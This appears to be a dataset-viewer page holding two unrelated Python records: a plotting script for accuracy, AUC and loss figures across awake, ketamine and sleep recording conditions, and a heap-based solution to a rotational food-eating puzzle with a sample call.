functionspath = 'E:/tiempo/Codigo/Funciones/'
sys.path.insert(0, functionspath)
from Functions_figures import (get_data,figure_all)
basepath = 'E:/tiempo/Resultados/' # base results dir (for CP 1 | 1 and 2)
UsarTF = False
# basepath must contain the result files and the functions script
## Which conditions to analyse
#filename = 'awake'
#filename = 'keta'
#filename = 'sleep'
# Load all csv result files: each call returns (results, shuffled control)
model_complexity = 1
NC = [1]
keta_c1,sh_keta_c1 = get_data(basepath,'keta',NC,model_complexity,False )
awake_c1,sh_awake_c1 = get_data(basepath,'awake',NC ,model_complexity,False )
sleep_c1,sh_sleep_c1 = get_data(basepath,'sleep',NC ,model_complexity,False )
# NC =[1,2]
# keta_c12,sh_keta_c12 = get_data(basepath,'keta', NC ,model_complexity,False )
# awake_c12,sh_awake_c12 = get_data(basepath,'awake', NC ,model_complexity,False )
# sleep_c12,sh_sleep_c12 = get_data(basepath,'sleep', NC ,model_complexity,False )
NC =[1,2,3]
keta_c123,sh_keta_c123 = get_data(basepath,'keta', NC ,model_complexity,False )
awake_c123,sh_awake_c123 = get_data(basepath,'awake', NC ,model_complexity,False )
sleep_c123,sh_sleep_c123 = get_data(basepath,'sleep', NC ,model_complexity,False )
# output directory is tagged with the model complexity (and TF flag below)
savepath = 'E:/tiempo/Figuras/Raw_MCx_'+str(model_complexity)
if UsarTF == True: # tag the output dir when using TF
    savepath = savepath +"_TF"
if not os.path.exists(savepath):
    os.makedirs(savepath)
# Accuracy figures ('A'); tvar/chivar presumably axis/chance levels -- confirm
variable,tvar,chivar = 'A',100,50
figure_all(awake_c123,sh_awake_c123,variable,tvar,chivar,savepath,'ACC_awake_123')
figure_all(keta_c123,sh_keta_c123,variable,tvar,chivar,savepath,'ACC_keta_123')
figure_all(sleep_c123,sh_sleep_c123 ,variable,tvar,chivar,savepath,'ACC_sleep_123')
# figure_all(awake_c12,sh_awake_c12,variable,tvar,chivar,savepath,'ACC_awake_12')
# figure_all(keta_c12,sh_keta_c12,variable,tvar,chivar,savepath,'ACC_keta_12')
# figure_all(sleep_c12,sh_sleep_c12 ,variable,tvar,chivar,savepath,'ACC_sleep_12')
figure_all(awake_c1,sh_awake_c1,variable,tvar,chivar,savepath,'ACC_awake_1')
figure_all(keta_c1,sh_keta_c1,variable,tvar,chivar,savepath,'ACC_keta_1')
figure_all(sleep_c1,sh_sleep_c1 ,variable,tvar,chivar,savepath,'ACC_sleep_1')
# AUC figures
variable,tvar,chivar = 'auc',1,0.4
figure_all(awake_c123,sh_awake_c123,variable,tvar,chivar,savepath,'AUC_awake_123')
figure_all(keta_c123,sh_keta_c123,variable,tvar,chivar,savepath,'AUC_keta_123')
figure_all(sleep_c123,sh_sleep_c123 ,variable,tvar,chivar,savepath,'AUC_sleep_123')
# figure_all(awake_c12,sh_awake_c12,variable,tvar,chivar,savepath,'AUC_awake_12')
# figure_all(keta_c12,sh_keta_c12,variable,tvar,chivar,savepath,'AUC_keta_12')
# figure_all(sleep_c12,sh_sleep_c12 ,variable,tvar,chivar,savepath,'AUC_sleep_12')
figure_all(awake_c1,sh_awake_c1,variable,tvar,chivar,savepath,'AUC_awake_1')
figure_all(keta_c1,sh_keta_c1,variable,tvar,chivar,savepath,'AUC_keta_1')
figure_all(sleep_c1,sh_sleep_c1 ,variable,tvar,chivar,savepath,'AUC_sleep_1')
# Loss figures
variable,tvar,chivar = 'L',3,0
figure_all(awake_c123,sh_awake_c123,variable,tvar,chivar,savepath,'Loss_awake_123')
figure_all(keta_c123,sh_keta_c123,variable,tvar,chivar,savepath,'Loss_keta_123')
figure_all(sleep_c123,sh_sleep_c123 ,variable,tvar,chivar,savepath,'Loss_sleep_123')
# figure_all(awake_c12,sh_awake_c12,variable,tvar,chivar,savepath,'Loss_awake_12')
# figure_all(keta_c12,sh_keta_c12,variable,tvar,chivar,savepath,'Loss_keta_12')
# figure_all(sleep_c12,sh_sleep_c12 ,variable,tvar,chivar,savepath,'Loss_sleep_12')
figure_all(awake_c1,sh_awake_c1,variable,tvar,chivar,savepath,'Loss_awake_1')
figure_all(keta_c1,sh_keta_c1,variable,tvar,chivar,savepath,'Loss_keta_1')
figure_all(sleep_c1,sh_sleep_c1 ,variable,tvar,chivar,savepath,'Loss_sleep_1')
# leftover plotting experiments kept for reference:
# fig, ax = plt.subplots(figsize=(8,6))
# bp = dfline.groupby('Iteration').plot()
# plt.close('all')
# plt.figure()
# plt.xlabel('epoca', fontsize=20);
# plt.ylim([0, 3])
# plt.scatter(dfline['epoca'],dfline['TL'],c='blue',alpha=0.3)
# plt.scatter(dfline['epoca'],dfline['VL'],c='red',alpha=0.3)
# ax = df.plot(secondary_y=['TL', 'VL'])
# g =sns.scatterplot(x="epoca", y="value", hue="variable",
#                    data=dfline,alpha=0.3)
18,799 | cea445538d963e681c40e432bdd3b62bd066ee5e | import heapq
def solution(food_times, k):
    """Return the 1-based index of the food eaten next after k seconds.

    Rotational eating: one second per food per pass, skipping foods that
    are finished. Returns -1 when everything is eaten within k seconds.
    """
    if sum(food_times) <= k:
        return -1

    remaining = [(t, i + 1) for i, t in enumerate(food_times)]
    heapq.heapify(remaining)

    eaten_per_food = 0
    count = len(food_times)
    while remaining:
        # seconds needed to finish off the current smallest food everywhere
        rounds_cost = (remaining[0][0] - eaten_per_food) * count
        if k < rounds_cost:
            break
        k -= rounds_cost
        eaten_per_food, _ = heapq.heappop(remaining)
        count -= 1

    # k full seconds remain inside an incomplete pass: walk it in index order
    remaining.sort(key=lambda item: item[1])
    return remaining[k % count][1]
# sample from the problem statement: expected answer is 1
food = [3, 1, 2]
k = 5
print(solution(food, k))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.